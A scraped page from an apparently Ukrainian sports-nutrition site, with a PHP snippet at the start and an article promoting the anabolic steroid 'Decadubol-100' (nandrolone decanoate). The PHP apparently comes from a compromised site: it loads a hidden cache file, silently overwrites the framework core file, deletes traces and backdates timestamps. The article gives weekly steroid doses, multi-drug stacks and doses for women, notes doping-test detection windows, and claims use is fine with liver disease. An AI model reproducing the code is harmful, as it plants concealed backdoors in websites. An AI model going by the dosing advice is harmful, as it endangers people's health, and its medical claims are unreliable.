$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Декадубол-100 | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Декадубол-100

ДекадуболДекадубол-100 це аналог всім добре відомого Дека-дураболіну. Дека-дураболін – це марочна назва фірми Органон, препарати якої містять нандролон деканоат. І хоча ця речовина міститься в багатьох препаратах, кожен атлет при згадці про нього думає відразу про дека-дураболін. Органон почав свої поставки Деки на ринок на початку 60-х. Це був ін'єкційний препарат різного дозування. Самими ходовими були упаковки по 50 мг / мл і 100 мг / мл. Дека-дураболін найпоширеніший і найуживаніший ін'єкційний стероїд. Пристрасть до нього пояснюється різноманітними можливостями його застосування і позитивними результатами. Головна властивість Деки добре описана у викладеній тут анотації до нього фірми "Органон ГмбН"; "Гарна анаболічна дія нандролон деканоата в його позитивному балансі азоту". Азот у зв'язаному стані є складовою частиною протеїну. Дека-дураболін змушує м'язову клітку акумулювати азот у більшій кількості, ніж вона віддає, що веде до позитивного азотного балансу. Позитивний баланс азоту рівносильний зростанню м'язів, оскільки м'язова клітина в цій фазі акумулює більшу кількість протеїну, ніж зазвичай.

Самі виробники вказують в анотаціях до своїх препаратів на те, що при їх прийомі настане позитивний баланс азоту і разом з ним гарний ефект вироблення білка при достатньому надходженні калорій і протеїнів. Це слід знати, тому що інакше не досягнеш задовільних результатів. Сильна анаболічна дія Дека-дураболін поєднується з невеликим андрогенним компонентом, Дека забезпечує гарний приріст м'язової маси і сили. При цьому у більшості атлетів спостерігається помітне скупчення води в організмі, яке не таке сильне як при прийомі ін'єкційних тестостеронів, але все-таки, у високих дозах, веде до пружного і водянистого зовнішнього вигляду. Оскільки Дека накопичує воду в сполучній тканині, то цей препарат може полегшувати або повністю усувати болі в суглобах. Тому атлети, які страждають болями в плечах, ліктях, колінах, можуть безболісно тренуватися при прийомі Декадубол-100. Ще одне "за" у тому, що Дека блокує рецептори картізола і в результаті менша його кількість потрапляє до м'язових клітин і до клітин сполучної тканини. Атлети застосовують Декадубол-100 для нарощування м'язової маси і в період підготовки до змагань.

Дека добре підходить для нарощування м'язової маси, тому що сприяє синтезу протеїну і одночасно впливає на ретенцію води в організмі. Оптимальна доза десь 200 - 600 мг на тиждень. Наукові дослідження показали, що кращі результати досягаються при прийомі 4 мг препарату на 1 кг ваги в тиждень. Хто вибере дозування менше 200 мг на тиждень, відчує лише дуже слабкий анаболічний вплив, який значно посилюється при підвищенні доз. Анаболічні, і отже, будівельні функції Декадубол-100 залежать певною мірою від дозування, тобто в діапазоні 200 - 600 мг на тиждень анаболічний вплив зростає майже в прямо пропорційній залежності до дози. Ті, хто вибирає дозу понад 600 мг на тиждень, зміщують співвідношення позитивно-негативного впливу у бік побічних явищ. Крім того анаболічний вплив більше не зростає в прямо пропорційній залежності до дози при дозуванні понад 600 мг на тиждень, 1000 мг на тиждень принесуть не найкращі результати ніж 600 мг. Новачки в стероїдних курсах повинні задовольнятися дозою в 200 мг на тиждень. Для нарощування м'язової маси Дека дуже добре комбінується з Діанаболом і тестостероном. Знаменита комбінація Діанабол-дека забезпечує швидкий і сильний приріст м'язів. Більшість атлетів приймають, як правило, 15 - 40 мг діанабола на день і 200 - 400 мг Деки на тиждень. Ще більш швидкі результати досягаються при прийомі 400 мг Деки на тиждень і 500 мг Сустанола 250 на тиждень. Про величезний приріст м'язів і сили говорять атлети при прийомі 400 мг Деки на тиждень, 500 мг Сустанола 250 на тиждень і 30 мг Діанабола на день. Дека - хороший базисний стероїд, який для нарощування м'язової маси комбінується з багатьма іншими стероїдами.

Хоча Декадубол-100 - не оптимальний стероїд для підготовки до змагань, багатьом атлетам він приносить гарні результати і в цій фазі. Оскільки Дека - анаболік тривалої дії, виникає небезпека скупчення зайвої кількості води перед змаганнями при більш високому дозуванні.

Цієї проблеми легко уникнути ін'єкцією більш швидко діючого дураболіну з його діючою хімічною речовиною нандролонфенілпропіонатом. Перетворення в естрогени, тобто ароматизація, можливі при прийомі Декадубол-100, але з'являються лише при дозуванні понад 400 мг на тиждень. Перед змаганнями з допінг - контролем приймати Деку не варто, оскільки продукти розпаду препарату виявляються в сечі навіть через місяці. Ті, кому подібні контролі не загрожують, можуть застосовувати Деку як базисний препарат сильного анаболічного впливу в дозах 400 мг на тиждень. Андрогени, які містяться в дозах по 400 мг на тиждень, допомагають до того ж прискоренню регенираціі. Небезпека скупчення води і ароматизації усувається комбінованим застосуванням Провірона і Нольвадекса. Часто спостерігається у підготоці до чемпіонатів атлетів комбінація під назвою: " Декадубол-100 400 мг на тиждень + Вінстрол 500 мг на тиждень, Параболан 228 мг на тиждень, оксандролон 25 мг на тиждень." Хоча побічні явища при прийомі Деки в дозуваннях понад 400 мг на тиждень можуть виникнути андрогенно обумовлені явища, що виражаються в підвищенні тиску крові, в уповільненні процесу згортання крові, що може призвести до частих кровотеч з носа і кровоточивість незагойних ран, а також посиленій діяльності сальних залоз і іноді до прогресуючого акне. Нестарі атлети говорять про головні болі і сексуальну суперстимуляцію. При прийомі дуже високих доз протягом більш тривалого часу у чоловіків можуть наступити затримки сперматогенезу, тобто яєчка будуть продукувати меншу кількість тестостерону. У цьому причина того, що Декадубол-100, як майже всі стероїди, викликає затримку викиду гонадропінів з гіпофіса.

Жінки, судячи з досвіду, при дозуванні 200 мг на тиждень не мають великих проблем з Декою. При більш високих дозах можуть наступити андрогенно обумовлені явища маскулінізації: зниження тембру голосу (часто незворотне), посилене оволосіння, акне, підвищене лібідо, іноді гіпертрофія клітора. Жінки, які мають підшкірні проблеми, з Декадубол-100 навіть при дозуванні в 50 мг на тиждень, можуть поліпшити свій стан за допомогою швидко діючого дураболіну. При одно-дворазовому застосуванні 50 мг Декадубол-100 на тиждень небажаного скупчення андрогенів не спостерігається, на відміну від довготривалої Деки. Оскільки більшість атлеток відмінно справляються з Декадубол-100, вони комбінують його з Оксандрополоном: Дека 50 мг на тиждень - Оксандрополон 10 мг на день. Обидва препарати в малих дозах слабо андрогенні, так що явища маскулінізації виникають рідко. Дека шляхом підвищеного синтезу протеїнів забезпечує малий приріст м'язів, а оксандролон внаслідок підвищеного синтезу креатинфосфату забезпечує приріст сили при дуже незначному скупченні води. Інші варіанти прийому, які часто спостерігаються у атлеток, - це Дека + таблетки Вінстрола, або Дека + таблетки Прімоболана S. Оскільки Декадубол-100 не робить негативного впливу на печінку, він може застосовуватися і при захворюваннях печінки. Дослідження показали, що комбіноване застосування Діанабола і Декадубол-100 веде до підвищення секреції печінки, яка все ж таки нормалізується при припиненні прийому алькулірованого Діанабола і при подальшому прийомі Деки. Навіть тривалість лікування Декадубол-100 в кілька років не виявляє ушкоджень печінки. Тому Дека добре комбінується з Андріолом (240 - 280 мг на день), тому що Андріол виводиться з організму не через печінку і, отже, не впливає на її функції. Ця комбінація є улюбленою у зрілих і обережних споживачів стероїдів.
 
Статті СТЕРОЇДИ Декадубол-100